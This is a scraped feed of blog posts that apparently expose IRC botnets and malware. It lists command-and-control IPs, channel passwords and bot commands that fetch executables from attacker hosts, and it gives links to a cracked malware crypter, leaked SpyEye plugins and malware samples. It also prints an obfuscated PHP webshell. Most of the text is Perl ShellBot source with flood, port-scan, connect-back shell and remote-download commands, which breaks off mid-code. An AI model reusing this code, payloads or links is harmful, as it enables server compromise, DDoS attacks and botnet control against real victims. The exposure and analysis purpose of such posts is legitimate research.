src="http://2.bp.blogspot.com/-cA7t3mEyJTU/TwjbwjeJgLI/AAAAAAAAAKs/8m-wQQfLiP8/s200/AboutColdSealCODER.png" /></a></div><br />About ColdSeal Cryptor<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-jPvQAQa96dQ/TwjcNUxvE2I/AAAAAAAAAK4/x9q0UE0xEr8/s1600/AboutColdSeal.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="150" width="200" src="http://3.bp.blogspot.com/-jPvQAQa96dQ/TwjcNUxvE2I/AAAAAAAAAK4/x9q0UE0xEr8/s200/AboutColdSeal.png" /></a></div><br />ColdSeal Cryptor<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-eE_7vomdoVs/TwjcbHl3ACI/AAAAAAAAALE/UoJ0iGSAg7o/s1600/Cold%2524eal.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="150" width="200" src="http://2.bp.blogspot.com/-eE_7vomdoVs/TwjcbHl3ACI/AAAAAAAAALE/UoJ0iGSAg7o/s200/Cold%2524eal.png" /></a></div><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-46cdiRTp9cM/TwjcrW3v-FI/AAAAAAAAALQ/riZZRiLMW84/s1600/Cold%2524eal1.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="150" width="200" src="http://3.bp.blogspot.com/-46cdiRTp9cM/TwjcrW3v-FI/AAAAAAAAALQ/riZZRiLMW84/s200/Cold%2524eal1.png" /></a></div><br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Z1szAabdZ4g/Twjc7fy8YUI/AAAAAAAAALc/0jFRtWJ4j7o/s1600/Cold%2524eal2.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="150" width="200" src="http://4.bp.blogspot.com/-Z1szAabdZ4g/Twjc7fy8YUI/AAAAAAAAALc/0jFRtWJ4j7o/s200/Cold%2524eal2.png" /></a></div><br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-yNs85IPeBx4/TwjdQcNgL4I/AAAAAAAAALo/8wtQbYqR2Qc/s1600/Cold%2524eal3.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="150" width="200" src="http://4.bp.blogspot.com/-yNs85IPeBx4/TwjdQcNgL4I/AAAAAAAAALo/8wtQbYqR2Qc/s200/Cold%2524eal3.png" /></a></div><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-XOQdeAx7wi0/Twjdge8JivI/AAAAAAAAAL0/MZXPR0XUgNo/s1600/Cold%2524eal4.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="150" width="200" src="http://1.bp.blogspot.com/-XOQdeAx7wi0/Twjdge8JivI/AAAAAAAAAL0/MZXPR0XUgNo/s200/Cold%2524eal4.png" /></a></div><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-kUHtKVP2kcQ/Twjd2DRrbqI/AAAAAAAAAMA/YlofLGqtWrA/s1600/5Cold%2524eal.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="150" width="200" src="http://2.bp.blogspot.com/-kUHtKVP2kcQ/Twjd2DRrbqI/AAAAAAAAAMA/YlofLGqtWrA/s200/5Cold%2524eal.png" /></a></div><br />this guy claim to be computer engineer ...lol<br />The tool is used mainly to protect malwares like RAT's,Bots,Trojans<br />alot of hf hecker's are buying this and this "coder" is making alot of money from this dirty busines<br /><br />Price:<br /><br />Pay to Account U2903909 (ToXiiC) via LR<br /><br />Amount $70.00 very high price for this crap<br /><br /><a href="http://cold-seal.net/">Author's website</a> <br /><br /><a href="http://ac43b4fc.theseforums.com">ColdSeal CRACKED</a><br /><br /><a href="http://www.crocko.com/13D33711BA8C46408468D26BEE5F71EC/Cold$eal.zip">ColdSeal CRACKED1</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1603915153795598150?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-18554358702538307362012-01-08T00:00:00.000+01:002012-01-08T00:00:20.245+01:00Downloader.Generic, Downloader, Trojan.Win32.Scar.rfw, BackDoor-DKA(hosted in United States Vpls Inc. D/b/a Krypt Technologies)Interessing malware <br /><br />here some infos i got from the exe:<br /><br />a.ip-163.com DNS_TYPE_A 174.139.61.74 <br /><br />what it does:<br /><br />Write to foreign memory areas: This executable tampers with the execution of another process. <br />Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary. <br />Start/Install windows service: This executable starts a windows service. Services have the highest level of privilege in Windows, and are thus useful for a number of malicious purposes. <br />Autostart capabilities: This executable registers processes to be executed at system start. This could result in unwanted actions to be performed automatically. <br />Creates files in the Windows system directory: Malware often keeps copies of itself in the Windows directory to stay undetected by users. <br />Execution did not terminate correctly: The executable crashed. <br />Modify system files: This executable modifies files in the windows system directories. <br />Spawns Processes: The executable produces processes during the execution. <br />Performs Registry Activities: The executable creates and/or modifies registry entries.<br /><br /><a href="http://8000395b.theseblogs.com">exe file if someone want to search inside</a><br /><br />hosting infos:<br />http://whois.domaintools.com/174.139.61.74<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1855435870253830736?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-91376691083180955042012-01-05T20:28:00.000+01:002012-01-05T20:28:49.687+01:0031.186.102.186(irc botnet hosted in Russian Federation Selectel Ltd)Remote Host Port Number<br />199.15.234.7 80<br />31.186.102.186 8765 PASS secret<br /><br />NICK n{US|XPa}vhxkqvn<br />USER vhxkqvn 0 0 :vhxkqvn<br />JOIN #GODS secret<br /><br />hosting infos:<br />http://whois.domaintools.com/31.186.102.186<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-9137669108318095504?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-57293184765086046922012-01-04T00:43:00.006+01:002012-01-04T14:05:15.542+01:00SpyEye PluginsHere some plugins used from the celebre malware SpyEye<br />found by formatme and allready public into russian forums<br />Reversing guys will have good time with this package<br />Guess what ? Theyre backdoored like everything leaked to public so be carefull<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://s17.postimage.org/agc5u6hjz/Spy_Eye_Plugins.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="467" width="669" src="http://s17.postimage.org/agc5u6hjz/Spy_Eye_Plugins.png" /></a></div><br /><br /><a href="http://12c3f89c.tinylinks.co/">Download</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5729318476508604692?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-59588285554367894832012-01-03T20:52:00.001+01:002012-01-28T20:13:20.131+01:00www.merkurvideo.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)Domains used to control bots:<br />www.facebookvideocentral.com 46.45.164.166<br />www.merkurvideo.com 46.45.164.166 <br />www.pr0.net 74.206.242.164<br /><br />C&C Server: 46.45.164.166:81<br />Server Password: <br />Username: SP3-431<br />Nickname: [00_DEU_XP_6037696]<br />Channel: #i (Password: ) <br />Channeltopic: :.asc -S -s |.http http://46.45.164.165/iii.exe |.asc exp_all 15 5 0 -c -e |.asc exp_all 15 5 0 -b -r -e |.asc exp_all 15 5 0 -c |.asc exp_all 10 5 0 -a -r -e |.asc exp_all 10 5 0 -c -e<br /><br />UPDATE:<br />www.facebookvideocentral.com 46.45.164.166<br />www.merkurvideo.com 46.45.164.166<br />www.pr0.net <br />www.pr0.net 74.206.242.164<br />Download URLs<br /> http://74.206.242.164/deny2/azenv.php (www.pr0.net) <br /> http://74.206.242.164/deny2/azenv.php (www.pr0.net) <br /> http://74.206.242.164/deny2/azenv.php (www.pr0.net) <br /> http://74.206.242.164/deny2/azenv.php (www.pr0.net) <br /><br /> C&C Server: 46.45.164.166:81<br /> Server Password: <br /> Username: SP3-978<br /> Nickname: [N00_DEU_XP_1776942]Ð_CHAR(0x05)_A<br /> Channel: (Password: ) <br /> Channeltopic: <br /> C&C Server: 46.45.164.166:81<br /> Server Password: <br /> Username: SP3-361<br /> Nickname: [00_DEU_XP_6980600]<br /> Channel: #k (Password: ) <br /> Channeltopic: :.asc -S -s |.http http://46.45.164.165/kk.exe |.asc exp_all 15 5 0 -c -e |.asc exp_all 15 5 0 -b -r -e |.asc exp_all 15 5 0 -c |.asc exp_all 10 5 0 -a -r -e |.asc exp_all 10 5 0 -c -e<br /><br />hosting infos:<br />http://whois.domaintools.com/46.45.164.164<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5958828555436789483?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-58130782213322644832012-01-03T19:47:00.001+01:002012-01-04T20:25:44.939+01:00xL.x1x2.in(ngrBot hosted in France Paris Gandi)Resolved : [xL.x1x2.in] To [95.142.167.131]port 4949 for irc<br />Resolved : [xL.x1x2.in] To [95.142.166.253]port 4949 for irc<br />Resolved : [xL.x1x2.in] To [92.243.15.137]port 4949 for irc<br />Resolved : [xL.x1x2.in] To [103.1.184.45]port 4949 for irc<br /><br />Remote Host Port Number<br />176.9.42.247 8332 Bitcoin Malware<br /><br />199.15.234.7 80<br /><br />199.7.176.144 80<br /><br />199.7.177.228 80<br /><br />74.120.10.153 80<br /><br />74.120.8.161 80<br /><br />95.142.167.131 4949 irc port (before he used port 5900)u need password for conection in this botnet<br />is not so hard for people wo really want to join there geting the passwd lol<br /><br />The data identified by the following URLs was then requested from the remote web server:<br />http://api.wipmania.com/<br />http://s481.hotfile.com/get/c7beee1329db43f39cc1d9b0df90a2fb0f227c7a/4f0345cd/2/eee0664170e0751b/84a4dcc/minerv4.exe<br />http://hotfile.com/dl/139063723/171a7fe/skkill.exe<br />http://hotfile.com/dl/139087308/808d704/minerv4.exe<br />http://hotfile.com/dl/138785531/af1c0bc/botxxxx1-2.exe<br />http://s332.hotfile.com/get/d414aca6e80162025fc78a0e2659aa1fc8727ab7/4f0345cb/2/1bdccba2084518fe/849f1ab/skkill.exe<br />http://s82.hotfile.com/get/58bcf25a8d53349f0da7e8bf9b40b69ad8d07d24/4f0345cf/2/94fdacb608286eb7/845b2fb/botxxxx1-2.exe<br /><br />just in case the hecker send abuse to hotfile or he remove exe files here u have them all:<br /><a href="http://4f57296b.ultrafiles.net">Download</a><br /><a href="http://596c9745.urlbeat.net">Download</a><br /><a href="http://ce47a92e.whackyvidz.com">Download</a><br /><a href="http://713c77b2.ultrafiles.net">Download</a><br /><a href="http://9646ca9c.theseblogs.com">Download</a><br /><br />feel free to post here any infos about botnet server,chanels etc if u find more<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5813078221332264483?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-43722251524787962142012-01-03T19:34:00.000+01:002012-01-03T19:34:40.557+01:00118.69.220.81(irc botnet hosted in Viet Nam Ip Range For Xdsl Iptv Fixed Phone Service At Hcmc)Remote Host Port Number<br />118.69.220.81 6667 PASS weed<br /><br />Clients: I have 110 clients and 0 servers<br />Local users: Current Local Users: 110 Max: 115<br />Global users: Current Global Users: 110 Max: 115<br /><br />MODE [00|USA|XP|SP2]-8799 +x<br />JOIN ##vam## vampir123<br />USERHOST [00|USA|XP|SP2]-8799<br />PONG :Vampir.hack-mx.ru.net<br />NICK [00|USA|XP|SP2]-8799<br />USER pmlai 0 0 :[00|USA|XP|SP2]-8799<br /><br />hosting infos:<br />http://whois.domaintools.com/118.69.220.81<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4372225152478796214?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-41010289414466598152012-01-03T16:25:00.000+01:002012-01-03T16:25:59.504+01:00picasa.com.syscommx.com(hecker using United States Fulshear Landis Holdings Inc)Today i noticed that a big hecker tryed to heck into one of my websites<br />here i m posting the script used to atack the web site <br />u have to decrypt it if u want to know more lol<br /><br />First he use this website to host his shit:<br />http://picasa.com.syscommx.com/<br />and his l33t hecker script is this one:<br />http://picasa.com.syscommx.com/bodat.php<br /><br />now some more search into dns:<br />Resolved : [picasa.com.syscommx.com] To [69.73.173.227]<br />Resolved : [nocdirect.com] To [69.73.138.35]<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>GIF89a?????&#255;&#255;&#255;!&#249;????,???????D?;?<?php<br />@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];<br />if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIbvB/sPMQhNQMR9XM05Cvsbg1DTE5vRJiEnnRbxvy9Jre5C8GJ35f143kMoyMYS+rNyn/5l/771H3T9+ABZxAHf6NI1TvSm6oDxJZ0Cc9nVG5pjxm5X9ZDa2QCEXa+TDQeWYnziXa2oqN7IoK0hOaWAH2PXA5INKYroa0XYDDoXhtFOvlZsqgk4aAzICjiALLJbps8cXiRQmj0Dv602jH4ZejFO8aQW4RYQG2hbccWeGeVVHw+6QxkwQHc+zG4FhsoHlkrlaF0gEz+GdhCEtCaAiYicjSKYWsgWKsPuTLoKMTS+vzk6mf+eLTWKWLW9l8DmKiGcdWDGh6ee8r+vRtMvsW90C2xWKrAqVjgnR5L9ZSwrD1Ud1cXT6vmVr8kpHStbi4mep6PiIfTe5FJSfgE='))); die; }<br />elseif (isset($osc)) { eval(gzinflate(base64_decode('pZHNasMwEITvhb6DYgyWIZS2lF5CwA9SEI48ilUcyWhlmhDy7l3J+ekhkENPEjM73w5SqXfdetMSPj9UB+07yNKTrlfPTyUI28mmAexlyWdSoXsvbhYrZnI6Wu9EnjKoj5wNILEWVcW+NUIusBvjYbaTb428xBT2liLJCnvoKrtNuubhZQLlMjPw21sniy9XXI0TVxoI94DUYxjUDXtmNDd9LvSAcqCI3bmY3yiKbYgyhZrZukIufB7aIirtXYRjRJ5lEa5TekDr5IOVY0sU+zDdXXox/722saQ46qeg+dNNQox+hJsfvghF/ffVioLDP70dIBeNgTccqWtxFNl/4bAJaDtWl2+v7x/1SpxSWT14SvS8mpWAOAWXQ0n5BQ=='))); }<br />else { eval(gzinflate(base64_decode('pVNdi9swEHw/uP+wEQbFkCZpy0G5xKGhJEdpoAX3nkIwii3XAtsSllwnd+S/V7LsOL409KF+8cfOjGdnV07Ic0VzBR5IVTAhUyITKodO8OO7/3OLmzLeuTNwwpilVCPPRfOOd7pSvqmUTeX+joYJBzzfL+b7YoHHIhFBmZOMDt0xNp/mk/0Cd7iYFxmQUDGeewhBRlXCIw8JLhUCmofqKKiHsjJVTJBCTQz+XUQUQWBUPUQqBCyq75e6ih4UKSixqLZpqY6p5lQsUsnjw6cHcZgllP1K1OOH6VQctMLYabDa7aQVsb104iwXpQJrzWBaL3U+CCR70S/vpwh+k7TUjzmtTMWEga51LDcI9Y+UZltZWe4zpmxrQSnSs9YXC7tlxzqwkpduPk7R4qbv8n98a3OcRP/0/Wxhev5mhLUai89r13Sv1+71/g705SQkj+oVi7mg+dDu4ghwhd2ZhRi6RbUk+xWGcVUwRdvqCNqZuuB5HqyXG3/lwivU3SC9qjbTdt+flk/LjVlTM3U0g1MnTlNJbxP952/+yofBYHDJhjhMuTy7ad2femK4E1tfebDbZ3yc+qHZ6LvQdO1zyMVRI9ZfNyt/i+2x3GKVicDMC+9GzeF1ewnY6bTn+rqRfhRvY+iza+9/J5/+AA=='))); }<br />?><br /></code></pre><br />hosting infos:<br />http://whois.domaintools.com/69.73.173.227<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4101028941446659815?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-40964474373538250192012-01-03T13:25:00.000+01:002012-01-03T13:25:50.410+01:00205.234.187.241(irc botnet hosted in United States Chicago Hostforweb Inc)205.234.187.241:2345 <br />Nick: New[AUT|00|P|64491]<br />Username: XP-9383<br />Joined Channel: #!loco!<br />Channel Topic for Channel #!loco!: ".m.s|.m.e Foto http://goo.gl/TYFFS?="<br />Private Message to Channel #!loco!: "[M]: Thread Activated: Sending Message With Email."<br />Private Message to Channel #!loco!: "[M]: Thread Disabled."<br />Private Message to User New[AUT|00|P|64491]: ".hp http://domredi.com/1/"<br /><br />hosting infos:<br />http://whois.domaintools.com/205.234.187.241<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4096447437353825019?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-36521159724402919032012-01-02T19:39:00.000+01:002012-01-02T19:39:04.479+01:0031.210.98.14(mIRC bots hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)Remote Host Port Number<br />31.210.98.14 6667<br /><br />NICK Maceachern<br />PING Maceachern<br />NICK _A_R_Z_U_<br />USER Woods-Powe "" "p2c.ekolik.net" :biliamee<br />USERHOST _A_R_Z_U_<br />MODE #seo<br />JOIN #!x!<br />MODE #!x!<br />USER Peters "" "p2c.ekolik.net" :coralyn<br />PING _A_R_Z_U_<br />USERHOST Maceachern<br /><br />hosting infos:<br />http://whois.domaintools.com/31.210.98.14<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3652115972440291903?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-23184333095808412322012-01-01T19:41:00.001+01:002012-01-03T20:13:47.904+01:002.byinter.net(ngrBot hosted in United States Stafford Singlehop Inc)C&C Server: 69.175.32.237:6667<br />Server Password: <br />Username: msgvvei<br />Nickname: A[DE-XPC]msgvvei<br />Channel: #KCA (Password: KCA) <br />Channeltopic: :!j #X<br /><br />Now talking in #X<br />Topic On: [ #X ] [ !j #XX !mdns http://69.175.32.237/~face/av.txt !mod usbi on ]<br />Topic By: [ KCA ]<br /><br />UPDATE:<br />PRIVMSG #aryan :[AryaN]: Successfully Executed Process: "C:\Documents and Settings\UserName\Application Data\10915679120753.exe"<br />NICK A[US-XPC]zjqsrws<br />USER zjqsrws 0 0 :zjqsrws<br />JOIN #KCA KCA<br />JOIN #X<br />JOIN #XX<br />PRIVMSG #KCA :[DNS]: Blocked 1259 domain(s) - Redirected 0 domain(s)<br />PRIVMSG #XX :[d="http://69.175.32.237/~face/kca2.exe" s="30208 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.exe" - Download retries: 0<br />NICK n{KCA}XP|USA|254521<br />USER 2545 "" "TsGh" :2545<br />JOIN #KCA2 KCA<br />NICK KCA{US-XP-x86}0466005<br />USER 0466005 "" "0466005" :0466005<br />MODE KCA{US-XP-x86}0466005 +iMm<br />JOIN #aryan KCA<br />PRIVMSG #aryan :[AryaN]: Downloading File: "http://69.175.32.237/~face/ng.exe"<br />PRIVMSG #aryan :[AryaN]: Successfully Downloaded File To: "C:\Documents and Settings\UserName\Application Data\10915679120753.exe"<br /><br /><br />hosting infos:<br />http://whois.domaintools.com/69.175.32.237<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2318433309580841232?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com1tag:blogger.com,1999:blog-2690706005301967154.post-81452121107137859762012-01-01T01:46:00.000+01:002012-01-01T01:46:06.516+01:0091.220.127.238(Linux Bots hosted in United Kingdom Vooservers Limited)<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>#!/usr/bin/perl<br /># ShellBOT<br /># 0ldW0lf - oldwolf@atrix-team.org<br /># - www.atrix-team.org<br /># Stealth ShellBot Vers?o 0.2 by Thiago X<br /># Feito para ser usado em grandes redes de IRC sem IRCOP enchendo o saco :)<br /># Mudan?as:<br /># - O Bot pega o nick/ident/name em uma URL e entra no IRC disfar?ado :);<br /># - O Bot agora responde PINGs;<br /># - Voc? pode definir o prefixo dos comandos nas configura??es;<br /># - Agora o Bot procurar pelo processo do apache para rodar como o apache :D;<br /># Comandos:<br /># - Adicionado comando !estatisticas <on/off>;<br /># - Alterado o comando @pacota para @oldpack;<br /># - Adicionado dois novos pacotadores: @udp <ip> <porta> <tempo> e @udpfaixa <faixa de ip> <porta> <tempo>;<br /># - Adicionado um novo portscan -> @fullportscan <ip> <porta inicial> <porta final>;<br /># - Adicionado comando @conback <ip> <porta> com suporte para Windows/Unix :D;<br /># - Adicionado comando: !sair para finalizar o bot;<br /># - Adicionado comando: !novonick para trocar o nick do bot por um novo aleatorio;<br /># - Adicionado comando !entra <canal> <tempo> e !sai <canal> <tempo>;<br /># - Adicionado comando @download <url> <arquivo a ser salvo>;<br /># - Adicionado comando !pacotes <on/off> para ativar/desativar pacotes :);<br /><br />########## CONFIGURACAO ############<br />my $processo = 'xXx';<br />if (`ps aux` =~ /xXx/)<br />{<br />exit;<br />}<br />$servidor='91.220.127.238' unless $servidor;<br />my $porta='6667';<br />my @canais=("#");<br />my @adms=("kuba","alan");<br /><br /># Anti Flood ( 6/3 Recomendado )<br />my $linas_max=10;<br />my $sleep=3;<br /><br />my $nick = getnick();<br />my $ircname = getnick();<br />my $realname = getnick();<br /><br />my $acessoshell = 1;<br />######## Stealth ShellBot ##########<br />my $prefixo = "!all";<br />my $estatisticas = 0;<br />my $pacotes = 1;<br />####################################<br /><br />my $VERSAO = '0.2a';<br /><br />$SIG{'INT'} = 'IGNORE';<br />$SIG{'HUP'} = 'IGNORE';<br />$SIG{'TERM'} = 'IGNORE';<br />$SIG{'CHLD'} = 'IGNORE';<br />$SIG{'PS'} = 'IGNORE';<br /><br />use IO::Socket;<br />use Socket;<br />use IO::Select;<br />chdir("/");<br />$servidor="$ARGV[0]" if $ARGV[0];<br />$0="$processo"."\0";<br />my $pid=fork;<br />exit if $pid;<br />die "Problema com o fork: $!" unless defined($pid);<br /><br />my %irc_servers;<br />my %DCC;<br />my $dcc_sel = new IO::Select->new();<br /><br />#####################<br /># Stealth Shellbot #<br />#####################<br /><br /><br /><br />sub getnick {<br /> #my $retornonick = &_get("http://www.freewebs.com/alezinn/names.txt");<br /> return "||".int(rand(1000));<br />}<br /><br /><br />sub getident {<br /> my $retornoident = &_get("http://www.minpop.com/sk12pack/idents.php");<br /> my $identchance = int(rand(100));<br /> if ($identchance > 30) {<br /> return $nick;<br /> } else {<br /> return $retornoident;<br /> }<br /> return $retornoident;<br />}<br /><br />sub getname {<br /> my $retornoname = &_get("http://www.minpop.com/sk12pack/names.php");<br /> return $retornoname;<br />}<br /><br /># IDENT TEMPORARIA - Pegar ident da url ta bugando o_o<br />sub getident2 {<br /> my $length=shift;<br /> $length = 3 if ($length < 3);<br /><br /> my @chars=('a'..'z','A'..'Z','1'..'9');<br /> foreach (1..$length)<br /> {<br /> $randomstring.=$chars[rand @chars];<br /> }<br /> return $randomstring;<br />}<br /><br />sub getstore ($$)<br />{<br /> my $url = shift;<br /> my $file = shift;<br /><br /> $http_stream_out = 1;<br /> open(GET_OUTFILE, "> $file");<br /> %http_loop_check = ();<br /> _get($url);<br /> close GET_OUTFILE;<br /> return $main::http_get_result;<br />}<br /><br />sub _get<br />{<br /> my $url = shift;<br /> my $proxy = "";<br /> grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;<br /> if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {<br /> my $host = $1;<br /> my $port = $2 || 80;<br /> my $path = $3;<br /> $path = "/" unless defined($path);<br /> return _trivial_http_get($host, $port, $path);<br /> } elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {<br /> my $host = $1;<br /> my $port = $2;<br /> my $path = $url;<br /> return _trivial_http_get($host, $port, $path);<br /> } else {<br /> return undef;<br /> }<br />}<br /><br /><br />sub _trivial_http_get<br />{<br /> my($host, $port, $path) = @_;<br /> my($AGENT, $VERSION, $p);<br /> #print "HOST=$host, PORT=$port, PATH=$path\n";<br /><br /> $AGENT = "get-minimal";<br /> $VERSION = "20000118";<br /><br /> $path =~ s/ /%20/g;<br /><br /> require IO::Socket;<br /> local($^W) = 0;<br /> my $sock = IO::Socket::INET->new(PeerAddr => $host,<br /> PeerPort => $port,<br /> Proto => 'tcp',<br /> Timeout => 60) || return;<br /> $sock->autoflush;<br /> my $netloc = $host;<br /> $netloc .= ":$port" if $port != 80;<br /> my $request = "GET $path HTTP/1.0\015\012"<br /> . "Host: $netloc\015\012"<br /> . "User-Agent: $AGENT/$VERSION/u\015\012";<br /> $request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);<br /> $request .= "\015\012";<br /> print $sock $request;<br /><br /> my $buf = "";<br /> my $n;<br /> my $b1 = "";<br /> while ($n = sysread($sock, $buf, 8*1024, length($buf))) {<br /> if ($b1 eq "") { # first block?<br /> $b1 = $buf; # Save this for errorcode parsing<br /> $buf =~ s/.+?\015?\012\015?\012//s; # zap header<br /> }<br /> if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }<br /> }<br /> return undef unless defined($n);<br /><br /> $main::http_get_result = 200;<br /> if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {<br /> $main::http_get_result = $1;<br /> # print "CODE=$main::http_get_result\n$b1\n";<br /> if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/<br />) {<br /> # redirect<br /> my $url = $1;<br /> return undef if $http_loop_check{$url}++;<br /> return _get($url);<br /> }<br /> return undef unless $main::http_get_result =~ /^2/;<br /> }<br /><br /> return $buf;<br />}<br /><br />#############################<br /># B0tchZ na veia ehehe :P #<br />#############################<br /><br />$sel_cliente = IO::Select->new();<br />sub sendraw {<br /> if ($#_ == '1') {<br /> my $socket = $_[0];<br /> print $socket "$_[1]\n";<br /> } else {<br /> print $IRC_cur_socket "$_[0]\n";<br /> }<br />}<br /><br />sub conectar {<br /> my $meunick = $_[0];<br /> my $servidor_con = $_[1];<br /> my $porta_con = $_[2];<br /><br /> my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);<br /> if (defined($IRC_socket)) {<br /> $IRC_cur_socket = $IRC_socket;<br /><br /> $IRC_socket->autoflush(1);<br /> $sel_cliente->add($IRC_socket);<br /><br /> $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";<br /> $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";<br /> $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;<br /> $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;<br /> nick("$meunick");<br /> sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");<br /> sleep 2;<br /> }<br /><br />}<br />my $line_temp;<br />while( 1 ) {<br /> while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta", "polnet"); }<br /> delete($irc_servers{''}) if (defined($irc_servers{''}));<br /> &DCC::connections;<br /> my @ready = $sel_cliente->can_read(0.6);<br /> next unless(@ready);<br /> foreach $fh (@ready) {<br /> $IRC_cur_socket = $fh;<br /> $meunick = $irc_servers{$IRC_cur_socket}{'nick'};<br /> $nread = sysread($fh, $msg, 4096);<br /> if ($nread == 0) {<br /> $sel_cliente->remove($fh);<br /> $fh->close;<br /> delete($irc_servers{$fh});<br /> }<br /> @lines = split (/\n/, $msg);<br /><br /> for(my $c=0; $c<= $#lines; $c++) {<br /> $line = $lines[$c];<br /> $line=$line_temp.$line if ($line_temp);<br /> $line_temp='';<br /> $line =~ s/\r$//;<br /> unless ($c == $#lines) {<br /> parse("$line");<br /> } else {<br /> if ($#lines == 0) {<br /> parse("$line");<br /> } elsif ($lines[$c] =~ /\r$/) {<br /> parse("$line");<br /> } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {<br /> parse("$line");<br /> } else {<br /> $line_temp = $line;<br /> }<br /> }<br /> }<br /> }<br />}<br /><br />sub parse {<br /> my $servarg = shift;<br /> if ($servarg =~ /^PING \:(.*)/) {<br /> sendraw("PONG :$1");<br /> } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {<br /> my $pn=$1; my $onde = $4; my $args = $5;<br /> if 